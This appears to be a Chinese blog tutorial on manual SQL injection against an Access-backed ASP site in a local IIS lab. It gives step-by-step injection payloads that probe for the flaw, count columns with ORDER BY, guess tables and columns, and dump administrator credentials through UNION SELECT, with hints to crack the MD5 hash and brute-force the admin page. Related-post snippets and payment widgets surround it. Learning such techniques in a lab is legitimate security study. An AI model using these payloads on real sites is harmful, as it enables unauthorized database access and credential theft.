ACCESS⼿⼯注⼊

已于 2024-08-20 20:36:03 修改
阅读量321 收藏 2
点赞数 7
文章标签: sql 数据库
于 2024-08-20 20:32:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kknifek/article/details/141367583
版权
下载地址:https://pan.baidu.com/s/1y6Gkvo7Wsbwj_zNbaBiCmA 提取码: kjg7
1.环境搭建
启动iis服务器 并浏览根⽬录 将压缩包解压到根⽬录下⾯,这个压缩包是我们需要搭建⽹站的压缩包,将这个压缩包解压到⽹站根⽬录下,获得⼀堆⽂件夹 我们环境所需要的是1111⽂件夹 将1111⽂件夹⾥⾯的所有东⻄放到根⽬录下⾯,最终如下图
2. access注⼊实战
步骤⼀: 打开⽹⻚判断是否存在注⼊
?id=14' // 报错
?id=14 and 1=1 // 正常
?id=14 and 1=2 // 错误
步骤⼆:order by判断列数 当order by 7的时候⻚⾯正常 order by 8的时候⻚⾯报错 说明有7个字段
id=14 order by 7 // ⻚⾯正常
id=14 order by 8 // ⻚⾯报错。说明有 7
步骤三:猜表
?id=14 and exists(select * from administrator) // administrator 表中查询数据,⻚⾯正常,说明查到数据了
步骤四:判断回显位置
?id=14 union select 1,2,3,4,5,6,7 // ⻚⾯报错,不符合 access 语法, select from
?id=14 union select 1,2,3,4,5,6,7 from administrator // ⻚⾯正常
步骤五:猜字段名 可能的字段名有 username user_name user ,password passwd pwd pass_wd
pass_word admin_name admin_username admin_user admin_passwd admin_pwd ...........
news_view.asp?id=14 union select 1,user_name,3,4,5,6,7 from administrator // 正常,说明存在这⼀列
news_view.asp?id=14 union select 1,user_name,password,4,5,6,7 from administrator // 成功查到密码
步骤六:密码进⾏md5解密 并去后台登录 后台地址爆破⼀下
桶将军T
关注
⽹络安全学习计划
qq_45541451的博客
07-15 6673
网络安全脚本小子学习计划 如何成为脚本小子第N天,制定的学习计划 网络安全的具体学习计划网络安全脚本小子学习计划第⼀阶段~信息安全基础1、信息安全基础2、nmap安装与使⽤3、burpsuite安装与使⽤⼆、Web基础三、Web安全⻔四、信息收集五、漏洞原理第⼆阶段~基础知识学习⼀、程序设计⼆、⽹络技术三、Linux四、数据库拓展第三阶段~渗透测试实战与⽹络安全⼀、web安全基础与拓展⼆、web安全攻防⼀、环境搭建⼆、WEB安全具基础部分三、常⻅web漏洞解析四、web安全具进阶及拓展五、web安全
各种数据库
2301_78031880的博客
08-20 728
(5)猜字段名 可能的字段名有 username user_name user ,password passwd pwd pass_wd pass_word admin_name admin_username admin_user admin_passwd admin_pwd ..........news_view.asp?Order by是数据库查询的时候对结果进⾏的排序,如果后⾯写的是字段,则根据查询字段进⾏排序, 但如果后⾯写的是数字,该数字⼤于所查询的字段数,则就会报错,⼩于的话就不会报错。
Spring IOC
Yearsuree的博客
05-15 208
Spring IOC Spring** 框架 2.1. Spring 框架概念 Spring 是众多开源java项⽬中的⼀员,基于分层的javaEE应⽤⼀站式轻量级开源框架,主要核⼼是IOC(控制反转/依赖)与 AOP(⾯向切⾯)两⼤技术,实现项⽬在开发过程中的轻松解耦,提⾼项⽬的开发效率。 在项⽬中引 Spring ⽴即可以带来下⾯的好处 降低组件之间的耦合度,实现软件各层之间的解耦。可以使⽤容器提供的众多服务,如:事务管理服务、消息服务等等。当我们使⽤容器管理事务时,开发⼈员就不再需要⼿控制
最新渗透测试面试题合集
热门推荐
网络安全
05-17 4万+
⽹上整理的渗透测试⾯试问题⼤全,有些 HW ⾯试的题,已经收集好了,提供给⼤家。现在就是毕业季节,希望各位都能找到好工作。 渗透篇 1、介绍⼀下⾃认为有趣的挖洞经历 挖洞也有分很多种类型,⼀种是以渗透、⼀种是以找漏洞为主,如果是前者会想各种办法获取权限继⽽获取想要的的东⻄完成渗透⽬标,这类跟 HW 类似,⽬标各种漏洞不算,要有 Shell,服务器权限才给分,这才是最接近实战渗透,跟某部⻔有合作的话也是属于这种打击⽹络犯罪获得权限、传销数据、组织架构,服务器权限、等…
Spring IOC详细介绍
weixin_44454512的博客
11-28 1838
Spring IOC 1. 主要内容 2. Spring 框架 2.1. Spring 框架概念   Spring 是众多开源java项⽬中的⼀员,基于分层的javaEE应⽤⼀站式轻量级开源框架,主要核⼼是IOC(控制反转/依赖)与 AOP(⾯向切⾯)两⼤技术,实现项⽬在开发过程中的轻松解耦,提⾼项⽬的开发效率。   在项⽬中引Spring⽴即可以带来下⾯的好处 降低组件之间的耦合度,实现软件各层之间的解耦。 可以使⽤容器提供的众多服务,如:事务管理服务、消息服务等等。 当我们使⽤容器管理事务时,
Spring概述(APO与IOC介绍与使用)
weixin_43118617的博客
09-10 1009
一,Spring介绍 1.1,Spring 简介 Spring 是分层的 full-stack(全栈) 轻量级开源框架,以 IoC 和 AOP 为内核,提供了展现层 Spring MVC 和业务层事务管理等众多的企业级应⽤技术,还能整合开源世界众多著名的第三⽅框架和类库,已经成为使⽤最多的 Java EE 企业应⽤开源框架。 Spring 官⽅⽹址:http://spring.io/ 我们经常说的 Spring 其实指的是Spring Framework(spring 框架)。 1.2,Spring 发
Spring IOC简单入门
qq_43517448的博客
11-22 155
Spring IOC: 主要内容: Spring框架 Spring框架概念 ​ Spring 是众多开源java项⽬中的⼀员,基于分层的javaEE应⽤⼀站式轻量级开源框架,主要核⼼是IOC(控制反转/依赖)与 AOP(⾯向切⾯)两⼤技术,实现项⽬在开发过程中的轻松解耦,提⾼项⽬的开发效率。 ​ 在项⽬中引 Spring ⽴即可以带来下⾯的好处 降低组件之间的耦合度,实现软件各层之间的解耦。可以使⽤容器提供的众多服务,如:事务管理服务、消息服务等等。当我们使⽤容器管理事务时,开发⼈员就不再需要⼿
Spring笔记
Author1thy的博客
10-25 280
第一部分 Spring概述 第1节Spring简介 Spring 是分层的 full-stack(全栈) 轻量级开源框架,以 IoC 和 AOP 为内核,提供了展现层 Spring MVC 和业务层事务管理等众多的企业级应⽤技术,还能整合开源世界众多著名的第三⽅框架和类库,已 经成为使⽤最多的 Java EE 企业应⽤开源框架。 Spring 官⽅⽹址:http://spring.io/ 我们经常说的 Spring 其实指的是Spring Framework(spring 框架)。 第2节Spring 发展
spring基础知识点讲解,spring面试题
kitty_hi的博客
05-08 156
spring相关知识讲解1. Spring 概述1.1 Spring简介1.2 Spring优势1.3 Spring 的核⼼结构2. Spring的核心思想2.1 IoC2.1.1 什么是IoC2.1.2 IoC解决了什么问题2.1.3 IoC和DI的区别2.2 AOP2.2.1 什么是AOP2.2.2 AOP在解决什么问题2.2.3 为什么叫做面向切面编程3. Spring IOC 应⽤3.1 Spring IoC基础3.1.1 BeanFactory与ApplicationContext区别 1. Sp
Spring 学习笔记 和 源码分析
Captain Leo的专栏
03-05 349
spring、架构、优势、AOP、IOC、DI、源码、应用、深度分析、Bean、Beans、横切、BeanFactory、ApplicationContext、ClassPathXmlApplicationContext、FileSystemXmlApplicationContext、AnnotationConfigApplicationContext、实例化Bean的三种⽅式、Bean的作用域及⽣命周期、依赖入、解、ComponentScan、懒加载、后置处理器、BeanFactoryPostProc
Spring IOC与AOP源码分析,吊锤面试官 SO easy!
xcz123x的博客
07-11 628
本文对Spring相关知识点做了归纳整理,包括 Spring 优势、其框架结构、核心思想,并对IoC思想及AOP思想进行手动实现,增强对Spring 核心思想的理解。之后对Spring IoC、AOP 的实现方式和特性进行介绍,并对照源码理解其实现思路。 Spring 优势 方便解耦,简化开发 「[:IoC(降低组件耦合性)、DI(降低业务对象替换的复杂性)]」 AOP编程的思想 「[:通用任务集中管理,使得代码可更好的复用]」 声明式事务的支持 「[:@Tra
【无标题】面试题
java_wangxiaogei的博客
01-24 1010
JDK、JRE、JVM之间的区别hashCode()与equals()之间的关系 String、StringBuffer、StringBuilder的区别泛型中extends和super的区别 ==和equals⽅法的区别重载和重写的区别 List和Set的区别 ArrayList和LinkedList区别 谈谈ConcurrentHashMap的扩容机制 Jdk . 到Jdk . HashMap 发⽣了什么变化(底层)? 说⼀下HashMap的Put⽅法 深..
Spring学习笔记
shanbaobin的博客
09-14 184
Spring学习笔记一、Spring概述Spring 简介Spring 发展历程Spring 的优势Spring 的核心结构二、核心思想IoCAOP三、手写实现 IoC 和 AOP第一步:实现容器第二步:实现xml读取并册第三步:实现依赖入第四部:实现事务的AOP四、Spring IOC源码深度剖析Spring IoC容器初始化主体流程BeanFactory创建流程BeanFactory获取子流程BeanDefinition加载、解析及册子流程Bean创建流程lazy-init 延迟加载机制原理Spr
SQL - 进阶语法(一)
qq_51222843的博客
09-21 651
关于SQL的进阶语法教程,包括简单合并数据库,修改数据库内容等操作
[OPEN SQL] SELECT语句
Hudas的博客
09-23 569
本文主要讲解OPEN SQL读取数据的SELECT语句相关知识点
Transact-SQL概述(SQL Server 2022)
brucexia的专栏
09-23 1312
Transact-SQL是Microsoft公司在关系数据库管理系统SQL Server中的SQL3标准的实现,是微软对SQL的扩展。在SQL Server中,所有与服务器实例的通信都是通过发送Transact-SQL语句到服务器来实现的。根据其完成的具体功能,可以将Transact-SQL语句分为四大类,分别为数据操作语句、数据定义语句、数据控制语句和一些附加的语言元素。
Postgresql特殊关键字
czjnoe的博客
09-25 296
表字段名称如果出现这些特殊关键字,则需要通过单引号访问字段,如offset、group。PostgreSQL特殊关键字。
渗透测试工具 sqlmap 基础教程
最新发布
2301_77160226的博客
09-25 675
一旦发现漏洞,sqlmap 可以自动利用漏洞获取数据库中的敏感信息,甚至可以获取数据库服务器的操作系统权限。sqlmap 是一款非常强大的渗透测试工具,它可以帮助我们快速检测和利用 SQL 入漏洞。在使用 sqlmap 进行渗透测试时,一定要遵守法律法规,确保获得了合法的授权,并意不要对目标系统造成过大的影响。在网络安全领域,渗透测试是一项至关重要的工作,它可以帮助我们发现系统中的安全漏洞,从而采取相应的措施进行修复。2.在 Windows 系统中,可以从 sqlmap 的官方网站下载安装包进行安装。
Access 2003数据库操作指南
"这篇文档是关于Access 2003的基本操作教程,旨在帮助用户全面掌握Access的基础功能。文档首先介绍了如何在Access 2003中打开数据库,包括直接从启动页选择已有的数据库或者通过资源管理器寻找并打开。接着,详细...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值